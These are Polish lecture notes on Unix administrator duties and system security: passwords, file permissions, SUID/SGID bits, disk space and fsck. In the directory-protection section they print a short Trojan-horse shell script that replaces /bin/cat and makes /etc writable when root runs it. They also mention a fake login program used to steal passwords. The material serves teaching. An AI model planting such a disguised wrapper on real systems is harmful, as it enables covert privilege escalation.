Bezpieczeństwo  zadania administratora systemu
Zadania administratora systemu
Główne zagadnienia wykładu
Zadania instalacyjne
" fizyczne zainstalowanie komputera z pamięciami masowymi i kartami specjalizowanymi;
" instalowanie oprogramowania podstawowego;
" instalowanie terminali, modemów, drukarek;
" instalowanie użytkowych pakietów programowych;
" dostosowanie parametrów środowiska systemu do potrzeb użytkowników.
Zadania pielęgnacyjne
" kontrola poziomu wykorzystania zasobów;
" strojenie systemu;
" archiwizacja systemu plików;
" kontrola zajętości przestrzeni dyskowej;
" kontrola spójności systemu plików;
" rekonfiguracja systemu plików;
" kontrola atrybutów związanych z utrzymaniem bezpieczeństwa systemu;
" podejmowanie działań dla utrzymania pożądanego poziomu bezpieczeństwa.
Obsługa żądań użytkowników
" zakładanie i usuwanie kont użytkowników;
" podział użytkowników na grupy;
" ustalanie zezwoleń na korzystanie z wyróżnionych zasobów systemu;
" odblokowywanie terminali i kont;
" kopiowanie dyskietek;
" powiadamianie użytkowników o zmianach w systemie.
Zadania wynikające z potrzeb bieżących
" uruchamianie i zatrzymywanie systemu;
" usuwanie zablokowanych procesów;
" sprawdzanie plików kroniki systemu;
" zapis wszystkich modyfikacji systemu i zdarzeń w dzienniku systemu.
Usuwanie awarii
" ustalanie przyczyn awarii;
" rekonstrukcja systemu plików.
Elementarne zasady ochrony
We wszystkich systemach, w których przechowywane i przetwarzane dane stanowią pewną
tajemnicę, wymagane jest przestrzeganie elementarnych zasad dla zapewnienia właściwej
ochrony systemu. Sprowadzają się one do:
" właściwego użycia haseł;
- wybieranie haseł trudnych do odgadnięcia i łatwych do zapamiętania;
- unikanie zapisywanie haseł;
Opracował: Zbigniew Suski 1
Bezpieczeństwo  zadania administratora systemu
- wykorzystywanie mechanizmu starzenia się haseł;
" odpowiedniego stosowania praw dostępu do plików i katalogów;
- wstawienie polecenia umask do pliku startowego;
- ustawianie minimalnych praw dostępu;
- przewidywanie skutków ustawienia praw dostępu w stosunku do katalogów;
" ochrony konta i parametrów określających atrybuty środowiskowe konta;
- niedopuszczenie możliwości pracy osobie postronnej (skrypt blok/ujący terminal);
- odpowiednie ustawienie praw dostępu do katalogu macierzystego;
- ustawienie zmiennej PATH (skutki wstawienia do ścieżki katalogu macierzystego).
Zasady bezpieczeństwa dla użytkowników:
" używaj właściwego hasła, łatwego do zapamiętania, nie znajdującego się w żadnym ze
słowników, wykorzystuj techniki mnemoniczne do określenia hasła;
" nigdy nie opuszczaj zalogowanego terminala, pamiętaj zawsze o zamknięciu sesji lub użyciu
programu blokującego terminal (lock);
" chroń wszystkie swoje pliki i katalogi, a w szczególności katalog HOME przed możliwością
zapisu przez użytkowników należących do grupy i pozostałych;
" używaj restrykcyjnej maski dla określania praw dostępu dla nowo tworzonych plików
(umask 27 lub umask 77), która pozbawia wszelkich praw dostępu użytkowników trzeciej
kategorii (others), a członkom grupy pozostawia ewentualnie prawo odczytu i wykonywania.
Podstawowy zakres działań administratora w ramach ochrony systemu powinien obejmować
następujące elementy:
" zarządzanie hasłami;
" ochrona plików systemowych stanowiących "newralgiczne" miejsca dla bezpieczeństwa
systemu;
" ochrona katalogów systemowych;
" ochrona przed wszelkimi zagrożeniami powodowanymi własnymi mechanizmami
systemowymi.
Zadania administratora w zakresie zarządzania hasłami
" akcja uświadamiająca użytkowników;
" kontrolowanie, czy użytkownicy właściwie tworzą hasła (sposób hakerski - programy
dostępne komercyjnie)
" właściwy dobór parametrów mechanizmu starzenia haseł.
Zadania administratora w zakresie ochrony newralgicznych plików systemowych
Kontrola pliku /etc/passwd powinna obejmować:
" prawo własności i prawa dostępu;
" poprawność pól w każdej z pozycji, określających konta użytkownika;
" obecność hasła dla każdego konta;
" pozycje kont o identyfikatorze równym 0.
Opracował: Zbigniew Suski 2
Bezpieczeństwo  zadania administratora systemu
Właścicielem pliku /etc/passwd powinien być użytkownik root. Plik ten powinien mieć
określone prawo do odczytu (r) dla wszystkich trzech kategorii użytkowników. Do kontroli można
wykorzystać polecenia pwck, pwdck, grep, cron.
Pliki specjalne
Pliki specjalne dyskowe powinny mieć prawa dostępu r i w tylko dla właściciela root. Prawa
takie umożliwiają dostęp do bloków dyskowych z pominięciem kontroli dostępu.
Prawa dostępu do plików terminali są przekazywane użytkownikowi otwierającemu sesję.
Po zakończeniu sesji zwracane root'owi. Hacker po uzyskaniu prawa zapisu może uruchomić
program udający proces login. Może w ten sposób uzyskać hasło użytkownika.
Zadania administratora w zakresie ochrony katalogów systemowych
W każdym systemie UNIX istnieje szereg kont administracyjnych jak root, bin, adm,
system, uucp, lp. Umożliwia to rozdzielenie funkcji administracyjnych.
Ochrona katalogów polega głównie na kontroli praw zapisu do tych katalogów. W katalogu
/etc znajdują się między innymi pliki: .profile, passwd. Prawo zapisu do katalogu /bin pozwala na
zainstalowanie skryptu pełniącego rolę Konia Trojańskiego.
$ ls -ld /bin
drwxrwxrwx 2 bin bin 5632 Jul 10 09:30 /bin
$ cd /bin
$ mv cat dcat
$ dcat > cat
if id|grep root > /dev/null; then chmod +w /etc; fi
exec /bin/dcat $*

$
Odnajdywanie wszystkich katalogow z prawem zapisu dla trzeciej kategorii użytkowników można
zrealizować poprzez polecenie
# find / -type d -perm -2 -print > /tmp/zapisywalne
Zadania administratora w zakresie ochrony przed skutkami mechanizmu identyfikatora
skutecznego
Każdy proces wykonywany w środowisku systemu UNIX charakteryzuje się dwoma
identyfikatorami, tzw. identyfikatorem rzeczywistym (ang. real) i identyfikatorem skutecznym (ang.
effective). Każdy z tych identyfikatorów stanowi parę (identyfikator użytkownika - UID, identyfikator
grupy - GID). Identyfikator rzeczywisty reprezentuje dane ustalone przez proces login. Przywileje
dostępu rozpatrywane są względem identyfikatora skutecznego.
Kiedy wydajemy polecenie date dla interpretatora /bin/sh, to w rezultacie identyfikatory
rzeczywisty i skuteczny procesu date są identyczne. Niektóre jednak z ogólnodostępnych
programów systemu UNIX muszą korzystać z plików o ściśle ograniczonych prawach dostępu. Gdy
wydamy polecenie /bin/passwd, to proces passwd przyjmie jako skuteczny identyfikator (root,
sys). W chwili uruchomienia procesu następuje ustawienie identyfikatora skutecznego zgodnie z
Opracował: Zbigniew Suski 3
Bezpieczeństwo  zadania administratora systemu
identyfikatorem właściciela pliku z programem, jeśli plik ten ma ustawiony bit SUID (ang. set user
identity) lub SGID (ang. set group identity). W przypadku wspomnianego procesu passwd
dziedziczy on identyfikator użytkownika od właściciela pliku /bin/passwd, a więc root, gdyż plik
/bin/passwd ma ustawione bity SUID, SGID. Na listingu uzyskanym za pomocą komendy ls plik jest
oznaczony jako wykonywalny, ze zmianą identyfikatora, co sygnalizuje litera 's' użyta zamiast litery
'x':
Bity SUID/SGID mogą być zmieniane za pomocą polecenia chmod, przy wykorzystaniu
wartości numerycznych (wartość 4000 dotyczy bitu SUID, a wartość 2000 bitu SGID).
Administrator powinien wykrywać takie zagrożenia, dokonując przeglądu wszystkich plików
posiadających własność SUID/SGID i wykorzystując polecenie find postaci:
# find / \(-perm -4000 -o -perm -2000\) -print > /tmp/suid_files.
Problem zagrożenia bezpieczeństwa systemu przez mechanizm SUID/SGID został praktycznie
usunięty w systemach o zwiększonym poziomie ochrony (systemy klasy C2 i klas wyższych).
Zadania administratora w zakresie obsługi systemu plików
" instalowanie w systemie nowych dysków i tworzenie systemów plików;
" utrzymywanie wolnej przestrzeni na dyskach;
" zarządzanie udziałami użytkowników w systemie plików;
" utrzymywanie integralności systemu plików;
" wykonywanie kopii bezpieczeństwa systemu plików;
" wykonywanie kopii archiwalnych systemu plików.
Kontrola zajętości pamięci.
Bardzo ważnym zadaniem administratora jest pielęgnacja systemu plików. Obejmuje ona
między innymi dbanie o zapewnienie każdemu użytkownikowi obszaru pamięci wystarczającego
dla jego potrzeb. Wobec tego administrator musi śledzić wykorzystanie pamięci w całym systemie
plików i podejmować odpowiednie działania, gdy obszar wolnej pamięci staje się zbyt mały.
System UNIX działa efektywnie, gdy w każdym systemie plików przynajmniej 15% obszaru
jest wolne. Administrator systemu powinien regularnie kontrolować wielkość wolnej pamięci we
wszystkich zamontowanych systemach plików oraz przypominać użytkownikom o konieczności
usuwania niepotrzebnych zbiorów. Przypomnienie takie można umieścić w zbiorze /etc/motd.
Będzie ono wówczas wyświetlane na terminalach użytkowników przy każdorazowym otwarciu sesji
(message of the day).
Komenda cleantmp czyści katalog plików tymczasowych /tmp. W zbiorze
/etc/default/cleantmp można określić jak często mają być czyszczone kluczowe katalogi.
Komenda df powoduje wyświetlenie liczby bloków pamięci dostępnych w określonym
systemie plików. Użycie odpowiedniej opcji w tym poleceniu umożliwia wyświetlenie również
procentowego udziału zajętej przestrzeni dyskowej.
Do wysyłania komunikatów do użytkowników administrator może wykorzystać polecenie
wall lub pocztę elektroniczną (mail).
Opracował: Zbigniew Suski 4
Bezpieczeństwo  zadania administratora systemu
Aby wyświetlić liczbę bloków zajmowanych przez katalog, należy użyć polecenia du. Z
kolei polecenie quot umożliwia wyświetlenie listy użytkowników wraz z liczbą bloków pamięci
dyskowej zajmowanych przez ich zbiory w określonym systemie plików.
Procedura kontroli wolnej przestrzeni
" Wysłać komunikat do użytkowników o potrzebie usunięcia niewykorzystywanych plików.
" Zlokalizować wyjątkowo duże katalogi i pliki.
" Zlokalizować i usunąć pliki tymczasowe i pliki core.
" Usunąć zawartość plików typu log.
" Zredukować fragmentację dysku poprzez wykorzystanie składowania systemu plików, jego
usunięcie i odtworzenie.
" Utworzyć i zamontować dodatkowy system plików (jeżeli nadal obszar wolny jest zbyt mały).
Kontrola integralności systemu plików.
Jednym z zadań administratora systemu jest zapewnienie ciągłej ochrony informacji
przechowywanej w systemie. Zbiory mogą ulec zniszczeniu w wyniku:
- zaniku zasilania,
- błędów sprzętu,
- błędów użytkownika.
System operacyjny UNIX wyposażony jest w pewne struktury nadmiarowe umożliwiające naprawę
uszkodzonego systemu plików. Uszkodzenie takie może być np. skutkiem zaniku zasilania.
Wszystkie działania na pamięci dyskowej UNIX wykonuje asynchronicznie, wykorzystując pamięć
buforową. W buforach znajduje się też najczęściej główny blok systemu plików (superblock) oraz
tablica węzłów indeksowych. Po upadku systemu spowodowanym awarią, stan podstawowych
struktur które zawierają m.in. listę wolnych bloków, zwykle nie odpowiada stanowi faktycznemu.
Do rekonstrukcji systemu plików wykorzystywany jest program fsck. Program ten
uruchamiany jest automatycznie w czasie ładowania systemu. Jeżeli system został zamknięty w
sposób nieprawidłowy, to podczas jego ponownego ładowania pojawi się komunikat informujący o
braku integralności systemu plików. Jednocześnie następuje zapytanie, czy podjąć próbę
zlikwidowania braku integralności. Odpowiedzią na to pytanie powinno być y (yes).
Program fsck można również uruchamiać w czasie pracy systemu. Należy jednak
przedtem wprowadzić system w tryb pracy jednoużytkownikowej. Sprawdzenie integralności
systemu plików przebiega w sześciu fazach. Obejmują one sprawdzanie bloków i ich rozmiarów,
ścieżek dostępu, połączeń, zgodności licznika łączników do pliku dla każdego zapisu w katalogu
oraz listy wolnych bloków. W każdej z faz program fsck wyświetla komunikaty o błędach w
systemie oraz połączone z nimi pytania o reakcję administratora na te błędy. Administrator
podejmuje decyzje dotyczące usunięcia wykrytych błędów odpowiadając na postawione pytania y
lub n.
Błędy lokalizowane przez program fsck
" bloki należące do wielu plików (i-węzłów);
" bloki zaznaczone jako wolne, lecz w rzeczywistości używane;
" bloki zaznaczone jako używane, w rzeczywistości wolne;
" niewłaściwe liczby łączników w i-węzłach (powoduje to utratę lub błędy w katalogach);
" rozbieżność między rozmiarem pliku w i-węz
le a liczbą przydzielonych bloków;
" nielegalne bloki przypisane do pliku (np tablice systemowe);
Opracował: Zbigniew Suski 5
Bezpieczeństwo  zadania administratora systemu
" niespójne dane w tablicach systemu plików;
" pliki zagubione (nie występujące w żadnym katalogu);
" nielegalne numery i-węzłów w katalogach (np nie opisujące żadnego pliku);
Opracował: Zbigniew Suski 6